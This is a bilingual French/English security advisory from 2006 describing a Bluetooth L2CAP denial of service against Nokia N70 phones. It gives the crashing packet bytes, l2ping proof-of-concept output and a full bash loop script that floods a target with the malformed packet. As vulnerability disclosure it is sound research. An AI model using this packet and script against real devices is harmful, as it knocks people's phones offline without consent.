[Infratech - vulnérabilité] Un Deuxième type de Déni de Service sur NOKIA N70 SecuObs - L'observatoire de la sécurite internet - Site d'informations professionnelles francophone sur la sécurité informatique

Failles

[Infratech - vulnérabilité] Un Deuxième type de Déni de Service sur NOKIA N70

Par Pierre Betouin, secuobs.com
Le 15/02/2006

Résumé : Un deuxième type de Déni de Service a été identifié sur le modèle N70 des téléphones portables de la marque Nokia. Cette faille, trouvée à l'aide de Bluetooth Stack Smasher, permet de rendre inutilisable ce type de téléphones. - Lire l'article

Version imprimable de cet article

Voir les commentaires de cet article
Voir les commentaires de la catégorie Failles
Voir l'ensemble des commentaires SecuObs
Suivre uniquement les commentaires de cet article en RSS

Suivre l'ensemble des commentaires SecuObs en RSS
Suivre tous les commentaires de la categorie Failles en RSS

[Version francaise] - [English version]

La plupart des téléphones mobiles de la marque Nokia sont vendus avec des fonctions Bluetooth. Ces fonctions ne sont pas activées par défaut.

Plus d'informations sur les téléphones de cette marque sur lien

L'envoi de paquets malformés peut provoquer sur les modèles n70 de la marque un Déni de Service (DoS) au minimum, cette faille a été trouvée avec l'utilitaire de fuzzing Bluetooth Stack Smasher v0.6 (cf. nouvelle version BSS 0.8 sur lien ).

Lors de la réception de nombreux paquets malformés de type L2CAP, le téléphone cellulaire Nokia n70 peut voir son activité ralentie puis figée (freeze) au bout d'une période de 30 secondes environ. La seule manière de reprendre la main étant alors de stopper le téléphone via le bouton d'arrêt/démarrage qui se fait surement par l'envoi d'une interruption RT.

Le paquet L2CAP responsable du DoS est le suivant :

7D AF 00 00 41 41 41

Avec :

Code field 0x7D (1 byte)
Ident field 0xAF (1 byte)
Length field 0x0000 (2 bytes)

0x41 représentant les octects de remplissage aléatoire (padding)

D'autres modèles de la marque Nokia peuvent être affectés, ils doivent être testés avec l'utilitaire de fuzzing précédemment cité BSS.

Aucune mise à jour du "Firmware" (logiciel embarqué) n'est disponible pour le moment, la seule solution envisageable est de désactiver les fonctions Bluetooth lorsque vous n'en avez pas besoin.

Un nouveau "Firmware" sera peut être mis à disposition par le constructeur sous peu.

Proof of Concept :
------------------
# l2ping -c 3 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ...
0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms
0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms
0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms
3 sent, 3 received, 0% loss

# ./loop.sh 00:15:A0:XX:XX:XX
(.. snip ..)

# l2ping -c 1 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ...
no response from 00:15:A0:XX:XX:XX id 0
1 sent, 0 received, 100% loss

Loop.sh étant le suivant :

#!/bin/bash
# Another Nokia N70 Bluetooth remote Denial of Service
# Pierre Betouin pierre.betouin@infratech.fr
# Feb 14 11:21:58 GMT+1 2006

echo "Another Nokia N70 Bluetooth remote Denial of Service"
echo "Pierre Betouin pierre.betouin@infratech.fr"
echo ""
if (( $# < 1 )); then
echo "Usage: $0 <btdaddr> (uses replay_l2cap_packet_nokiaN70)"
exit
fi

if [ -x ./replay_l2cap_packet_nokiaN70 ]; then
echo "Kill this prog with \"killall -9 loop.sh\" in another terminal."
echo "PRESS ENTER TO LAUNCH THE DoS (or Ctrl-c to exit now)"
echo ""
read
while (( 1 )); do # Infinite loop, a bit dirty, we must say ;)
./replay_l2cap_packet_nokiaN70 $1
done
else
echo "You must compile replay_l2cap_packet_nokiaN70 before"
echo "gcc -lbluetooth -o replay_l2cap_packet_nokiaN70 replay_l2cap_packet_nokiaN70.c"
exit

fi

Vous pouvez télécharger replay_l2cap_packet_nokiaN70.c sur lien

Autres ressources sur la sécurité Bluetooth :

[Dossier Sécurité Bluetooth - partie 1] Introduction aux technologies Bluetooth lien

[Dossier Sécurité Bluetooth - partie 2] Présentation des utilitaires Bluetooth lien

[Dossier Sécurité Bluetooth - partie 3] Les attaques génériques lien

[Dossier Sécurité Bluetooth - partie 4] Les attaques d'implémentations lien

[Dossier Sécurité Bluetooth - partie 5] Scénarios possibles & synthèse lien

[Infratech - vulnérabilité] PoC pour le DoS sur les téléphones portables Sony/Ericsson lien

[Infratech - vulnérabilité] Déni de Service sur les téléphones mobiles Sony/Ericsson lien

[Infratech - vulnérabilité] PoC pour le DoS sur hcidump lien

[Infratech - vulnérabilité] Déni de Service sur hcidump lien

[Infratech - release] BSS - Bluetooth Stack Smasher v0.6 lien

[Infratech - vulnérabilité] Déni de Service sur Nokia N70 lien

[English Version] - [Version francaise]

Most of Nokia cell phones sold now are Bluetooth compliant. Bluetooth is not enabled by default.
Lots of users use it with several other devices (earsets, GPS systems, and so on).

More information about these devices on lien

Bluetooth technology uses at the lowest level a L2CAP layer for multiplexing and "access to media" purposes.

Other upper protocols, such as RFCOMM or SDP, use it for instance.

Malformed packets can lead to, at least, a denial of service on affected devices. This flaw was found using the BSS tool ( Bluetooth Stack Smasher new release v0.8 : lien ).

When receiving numerous short buggy L2CAP packets, Nokia N70 cellular phones begin to be slower and then freeze after a short period (within 30 seconds). The only available button is the "halt button" located at the top of the phone (maybe controlled by a RT interruption) which allows users to shut down their device.

L2CAP packets responsible of the crash are :
7D AF 00 00 41 41 41

Where:
Code field 0x7D (1 byte)
Ident field 0xAF (1 byte)
Length field 0x0000 (2 bytes)

0x41 bytes are random padding.

Other Nokia devices may be affected and should be tested with BSS fuzzer. Solution is to switch off bluetooth on the phone. A firmware upgrade may be distributed later by Nokia.

Proof of Concept :
------------------
# l2ping -c 3 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ...
0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms
0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms
0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms
3 sent, 3 received, 0% loss

# ./loop.sh 00:15:A0:XX:XX:XX
(.. snip ..)

# l2ping -c 1 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ...
no response from 00:15:A0:XX:XX:XX id 0
1 sent, 0 received, 100% loss

Loop.sh as follows :

#!/bin/bash
# Another Nokia N70 Bluetooth remote Denial of Service
# Pierre Betouin pierre.betouin@infratech.fr
# Feb 14 11:21:58 GMT+1 2006

echo "Another Nokia N70 Bluetooth remote Denial of Service"
echo "Pierre Betouin pierre.betouin@infratech.fr"
echo ""
if (( $# < 1 )); then
echo "Usage: $0 <btdaddr> (uses replay_l2cap_packet_nokiaN70)"
exit
fi

if [ -x ./replay_l2cap_packet_nokiaN70 ]; then
echo "Kill this prog with \"killall -9 loop.sh\" in another terminal."
echo "PRESS ENTER TO LAUNCH THE DoS (or Ctrl-c to exit now)"
echo ""
read
while (( 1 )); do # Infinite loop, a bit dirty, we must say ;)
./replay_l2cap_packet_nokiaN70 $1
done
else
echo "You must compile replay_l2cap_packet_nokiaN70 before"
echo "gcc -lbluetooth -o replay_l2cap_packet_nokiaN70 replay_l2cap_packet_nokiaN70.c"
exit

fi

You can download replay_l2cap_packet_nokiaN70.c on lien

Author Website on lien

Les articles de la revue de presse sur les mots clés : nokia
Les videos sur SecuObs pour les mots clés : nokia
Voir tous les articles de "Pierre Betouin" publiés sur SecuObs (17 résultats)
Voir tous les articles publiés par l'organisme "secuobs" sur SecuObs (998 résultats)

Version imprimable de cet article

Voir les commentaires de cet article
Voir les commentaires de la catégorie Failles
Voir l'ensemble des commentaires SecuObs
Suivre uniquement les commentaires de cet article en RSS

Suivre l'ensemble des commentaires SecuObs en RSS
Suivre tous les commentaires de la categorie Failles en RSS

- Article suivant : [Infratech - vulnérabilité] Nouvelle version 0.8 de Bluetooth Stack Smasher
- Article précédent : [Infratech - vulnérabilité] Déni de Service sur NOKIA N70
- Article suivant dans la catégorie Failles : [Infratech - vulnérabilité] Nouvelle version 0.8 de Bluetooth Stack Smasher
- Article précédent dans la catégorie Failles : [Infratech - vulnérabilité] Déni de Service sur NOKIA N70

Les derniers commentaires publiés pour cet article:

- Nokia N70/N73 Bluetooth Stack OBEX Implementation Denial of Service ...

Les derniers commentaires de la catégorie Failles:

- ESRT @sambowne - Russian firm Elcomsoft unveils tool to crack BlackBerry encryption security ... - SPIP recently fixed 2 vulnerabilities notified by Tehtri-Security 0day ... - PuttyHijack session hijack POC ... - ESRT @thierryzoller - Updated BEAST blog post with Proof of Concept code and the whitepaper ... - ESRT @y0ug @Securelist - New article published: MYBIOS Is BIOS infection a reality ...

Les derniers articles de la catégorie Failles :

- Les russes ont-ils pwn le système AEGIS ? - Backdoors BMC éventuelles via une faille IPMI sur au moins 100 000 serveurs publics - Jekyll, une application malicieuse contournant les détections de l App Store d Apple - La vulnérabilité cryptographique d Android, l origine du vol de 5 720 dollars en bitcoins - Une faille critique de Firefox expose les utilisateurs de Tor Browser Bundle - Une porte dérobée présente depuis 9 mois dans OpenX - De mauvaises implémentations d UEFI permettent de contourner Secure Boot - Prendre le contrôle d une voiture avec une manette de jeu, c est possible - Une nouvelle vulnérabilité critique aurait été découverte dans Java 7 - Les problèmes de sécurité des cartes SIM peuvent être facilement corrigés + d'articles de la catégorie Failles

SecuToolBox :

Bluetooth Stack Smasher v0.6 / Bluetooth Stack Smasher v0.8 / Slides Bluetooth Eurosec 2006 / Exposé vidéo Windows Shellcode - Kostya Kortchinsky / Exposé audio Reverse Engineering - Nicolas Brulez / Exposé vidéo Securitech - Pierre Betouin / Secure WIFI WPA + EAP-TLS + Freeradius / Audit Windows / Captive Password Windows / USBDumper / USBDumper 2 / Hacking Hardware / WishMaster backdoor / DNS Auditing Tool / Ettercap SSL MITM / Exploit vulnérabilités Windows / Memory Dumper Kernel Hardening / Reverse Engineering / Scapy / SecUbuLIVE CD / Metasploit / eEye Blink Sec Center / eEye Retina Scanner + d'outils / + de tutoriels

Mini-Tagwall des articles publiés sur SecuObs :

sécurité, exploit, windows, attaque, outil, microsoft, réseau, audit, metasploit, vulnérabilité, système, virus, internet, usbsploit, données, source, linux, protocol, présentation, scanne, réseaux, scanner, bluetooth, conférence, reverse, shell, meterpreter, vista, rootkit, détection, mobile, security, malicieux, engineering, téléphone, paquet, trames, https, noyau, utilisant, intel, wishmaster, google, sysun, libre + de mots clés avec l'annuaire des articles publiés sur SecuObs

Mini-Tagwall de l'annuaire video :

curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit, exploit, lockpicking, linux, attack, wireshark, vmware, rootkit, conference, network, shmoocon, backtrack, virus, conficker, elcom, etter, elcomsoft, server, meterpreter, openvpn, ettercap, openbs, iphone, shell, openbsd, iptables, securitytube, deepsec, source, office, systm, openssh, radio + de mots clés avec l'annuaire des videos

Mini-Tagwall des articles de la revue de presse :

security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone, server, inject, patch, apple, twitter, mobile, virus, ebook, facebook, vulnérabilité, crypt, source, linux, password, intel, research, virtual, phish, access, tutorial, trojan, social, privacy, firefox, adobe, overflow, office, cisco, conficker, botnet, pirate, sécurité + de mots clés avec l'annuaire de la revue de presse

Mini-Tagwall des Tweets de la revue Twitter :

security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall, network, twitter, vmware, windows, microsoft, compliance, vulnerability, python, engineering, source, kernel, crypt, social, overflow, nessus, crack, hacker, virus, iphone, patch, virtual, javascript, malware, conficker, pentest, research, email, password, adobe, apache, proxy, backtrack + de mots clés avec l'annuaire de la revue Twitter